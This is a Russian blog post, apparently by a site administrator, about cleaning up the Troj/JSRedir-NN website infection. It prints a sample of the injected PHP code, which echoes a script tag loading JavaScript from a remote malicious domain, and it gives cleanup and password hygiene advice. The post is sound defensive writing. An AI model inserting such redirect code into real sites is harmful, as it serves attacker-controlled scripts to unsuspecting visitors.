удаление вируса Troj/JSRedir-NN

Очередная модификация вердикта от Яндекса для зараженных сайтов. «Очередная», потому что заражение очень похоже на Troj/JSRedir-NZ.

Вставка обнаруживается в .php, .htm/html, .js файлах.
Пример вредоносного кода:

< ?php
#925259#
if(empty($fqnj)) {
$fqnj = "<script type=\"text/javascript\" src=\"//givingcub. com/assets/js/bnvbhp3h. php?id=322971\">";
echo $fqnj;
}
#/925259#
?>
<em>* - где #925259# - набор буквоцифр любой, домен и адрес скрипта тоже.</em>

Т.к. вредоносные вставки прописываются одновременно в разные типы файлов и разные места (вставка может быть как в начале/конце файла, так и в любом месте в коде) и в access|error.log’ах нет упоминания про открытие зараженных файлов, то вероятной причиной заражения является перехват пароля ftp/ssh.
Из всего вышесказанного следует, что пароли фтп, баз данных, админок желательно переодически менять и не забывать обновлять движки/модули/плагины ваших сайтов :-) .

Скажите свое мнение

ваш email не публикуется. обязательно *

;-) :yawn: :whew: :toivo: :tmi: :time: :thinking: :talking: :sweating: :swear: :sun: :star: :smoke: :smirk: :sleepy: :skype: :shock: :shake: :rofl: :rain: :punch: :puke: :poolparty: :pizza: :phone: :party: :oops: :nod: :no: :ninja: :neutral: :nerd: :music: :muscle: :mrgreen: :movie: :mooning: :mmm: :middlefinger: :makeup: :mail: :mad: :lol: :lipssealed: :kiss: :itwashtme: :inlove: :idea: :hi: :heidy: :heart: :headbang: :happy: :handshake: :giggle: :fubar: :flower: :evilgrin: :emo: :dull: :drunk: :drink: :doh: :devil: :dance: :cry: :cool: :coffie: :clapping: :cash: :call: :cake: :bug: :brokenheart: :bow: :blush: :beer: :bear: :bandit: :arrow: :angry: :angel: :^) :???: :?: :-| :-o :-P :-D :-) :-( :!:

 

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.